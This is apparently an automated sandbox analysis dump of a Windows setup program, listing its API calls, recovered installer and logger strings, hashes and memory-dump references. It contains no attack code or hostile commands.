                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 984842325-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3563064969-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,-00000010,00000000,00D97F74,00000001,00000364,-00000010,00000006,000000FF,?,00000000,?,?,8007000E,00BAA59F), ref: 00D99761
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D81AEA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,8000000B,02141699), ref: 00D81B4A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionHeapRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3789339297-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00D9FD0E,?,?,00D9FD0E,00000220,?,-00000010,?), ref: 00D981EA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • API String ID: 0-2743806192
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • API String ID: 0-1632631402
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00EA16D0,C0000000,00000003,00000000,00000004,00000080,00000000,02141699,00EA16AC,00EA16C4), ref: 00D003F0
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D0040D
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D00486
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D0058A
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D005FB
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,008651D8,00000026,00000000,00000000), ref: 00D0062B
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,00E1A104,00000002), ref: 00D006D6
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D006DF
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D00630
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 00D007D3
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00D00859
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D00864
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,00E1A104,00000002,?,?,CPU: ,00000005), ref: 00D008D8
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D008E1
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,00E1A104,00000002), ref: 00D00966
                                                                                                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 00D0096F
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$BuffersFlushWrite$DebugOutputString$Init_thread_footer$CreateErrorFindHeapLastPointerProcessResource
                                                                                                                                                                              • String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                                                                                                                                                              • API String ID: 4051163352-1312762833
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDCFA1
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDD131
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD321
                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,00E1BD76), ref: 00BDD6C1
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD744
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD74B
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD752
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDD768
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BDD95E
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA6F
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA76
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA7D
                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00BDDA84
                                                                                                                                                                                • Part of subcall function 00BC2290: FindClose.KERNEL32(00000000,?,?,?), ref: 00BC23CF
                                                                                                                                                                                • Part of subcall function 00BC2290: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BC2487
                                                                                                                                                                                • Part of subcall function 00CCEF90: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                                • Part of subcall function 00CCEF90: GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapLastMessagePathProcessSleep
                                                                                                                                                                              • String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                                                                                                                                              • API String ID: 2370152566-3482523422
                                                                                                                                                                              • Opcode ID: 78d299a8dc52f23c2ab10df60e44a15328a082a7b2f2deb6fa27874e536c57b2
                                                                                                                                                                              • Instruction ID: 9d60eb3735c31b945a7c4a545f3dc945f78f0d3dd54dabda891f362b93ecdf8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 78d299a8dc52f23c2ab10df60e44a15328a082a7b2f2deb6fa27874e536c57b2
                                                                                                                                                                              • Instruction Fuzzy Hash: B5A2BE70D002198FDB24DF68CC45BADFBB1EF45314F1482DAE459AB291EB70AE85CB91
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCD479
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCD897
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BCDA2C
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeString$HeapInit_thread_footer$AllocateFindProcessResource
                                                                                                                                                                              • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                                                                                                                              • API String ID: 2507001652-3153392536
                                                                                                                                                                              • Opcode ID: 1766b4db2b72a0701fe25efef3a93c32bb673ce6a754695cae289238e50350c0
                                                                                                                                                                              • Instruction ID: e6e348a7aaee7c546158f9ba4b6c0222b38e54bc98504a6d4dbe16c4cf42d6c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 1766b4db2b72a0701fe25efef3a93c32bb673ce6a754695cae289238e50350c0
                                                                                                                                                                              • Instruction Fuzzy Hash: 28E2A175D00248DFDB14DFA8C884B9EBBF4FF49314F2482ADE415A7291EB74AA85CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC0538
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BC05B3
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00BC05D2
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BC05E0
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC05F7
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00BC0618
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00BC062F
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC06E8
                                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00BC076D
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BC079C
                                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00BC07B9
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC07DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$LongRectShow$Client$AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2610838350-0
                                                                                                                                                                              • Opcode ID: 6d998cdb57e901e9c6f440cca6303c801657dc6ca063dd5dab495c79892ce3af
                                                                                                                                                                              • Instruction ID: 596847fe0ff5eb3050fc85c7d189de3a78c9377e40360cef7f671bf633d0f6ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d998cdb57e901e9c6f440cca6303c801657dc6ca063dd5dab495c79892ce3af
                                                                                                                                                                              • Instruction Fuzzy Hash: 41422671A14208DFCB14DFA9D884AAEBBF5FF88304F10856EE859EB261D730A945CF51
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BB6B00: EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,?,?,?,?,?,?,00BB632E,00DAB45D,000000FF), ref: 00BB6B3D
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB681B
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB682B
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB6836
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BB6844
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00BB6852
                                                                                                                                                                              • GetWindowTextLengthW.USER32(?), ref: 00BB6876
                                                                                                                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00BB68E5
                                                                                                                                                                              • SetWindowTextW.USER32(?,00E172AC), ref: 00BB68F1
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6926
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6934
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB6988
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BB6A13
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A2C
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BB6A73
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$FreeGlobalStringText$CursorLoadNtdllProc_$AllocCriticalEnterLengthLockSectionUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2358954841-0
                                                                                                                                                                              • Opcode ID: 50b18665082e0ac9d4feea3753a01550cc079298c1750e8c0fb28eb39d19e048
                                                                                                                                                                              • Instruction ID: 216102286f4eae4a2085ab877fc3cb273e191611e8525b8403460f4dbf7dacdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 50b18665082e0ac9d4feea3753a01550cc079298c1750e8c0fb28eb39d19e048
                                                                                                                                                                              • Instruction Fuzzy Hash: 47D1AE71900205AFDF10DFA5CC48BBEBBF8EF45714F1481A9E911A7290DBB99E04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00BC23CF
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BC2487
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,00000000), ref: 00BC25DC
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 00BC25F6
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,?,00000000), ref: 00BC2629
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00BC2698
                                                                                                                                                                              • SetLastError.KERNEL32(0000007B), ref: 00BC26A6
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00BC26FC
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00BC271C
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(*.*,?,02141699), ref: 00BC28B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$Find$CloseFullName_wcsrchr$ErrorFileFirstLast
                                                                                                                                                                              • String ID: *.*$\\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 1241272779-1700010636
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB617B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00BB618B
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00BB6196
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00BB61A4
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EB), ref: 00BB61B2
                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BB61D6
                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BB6245
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00E172AC), ref: 00BB6251
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6286
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6294
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB62E8
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB634D
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000000,00000000,02141699,00000000), ref: 00BB639F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$GlobalText$NtdllProc_$AllocLengthLockUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2673961051-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 00CAA28B
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00CAA2DE
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00CAA2E1
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00CAA2F0
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00CAA2F3
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00CAA320
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 00CAA35F
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00CAA370
                                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00CAA386
                                                                                                                                                                                • Part of subcall function 00C5F860: IsWindowVisible.USER32(?), ref: 00C5F8DA
                                                                                                                                                                                • Part of subcall function 00C5F860: GetWindowRect.USER32(?,?), ref: 00C5F8F2
                                                                                                                                                                                • Part of subcall function 00C5F860: GetWindowRect.USER32(?,?), ref: 00C5F90A
                                                                                                                                                                                • Part of subcall function 00C5F860: IntersectRect.USER32(?,?,?), ref: 00C5F927
                                                                                                                                                                                • Part of subcall function 00C5F860: EqualRect.USER32(?,?), ref: 00C5F937
                                                                                                                                                                                • Part of subcall function 00C5F860: GetSysColorBrush.USER32(0000000F), ref: 00C5F94D
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 00CAA39C
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00CAA3BC
                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00CAA3E0
                                                                                                                                                                              • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 00CAA3F3
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Window$MessageSend$CompatibleCreateParent$BitmapBrushColorDeleteEqualFillIntersectObjectPointsSelectVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2161025992-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00BCF4F1
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BCF4AE
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00BCFA12
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00BCFAC0
                                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 00BCFB61
                                                                                                                                                                                • Part of subcall function 00CC0250: __cftof.LIBCMT ref: 00CC02A0
                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00BCFD98
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
                                                                                                                                                                              • String ID: AiFeatIco$Dj$Dj$Icon
                                                                                                                                                                              • API String ID: 2303580663-1543522245
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD1DED
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD1F92
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
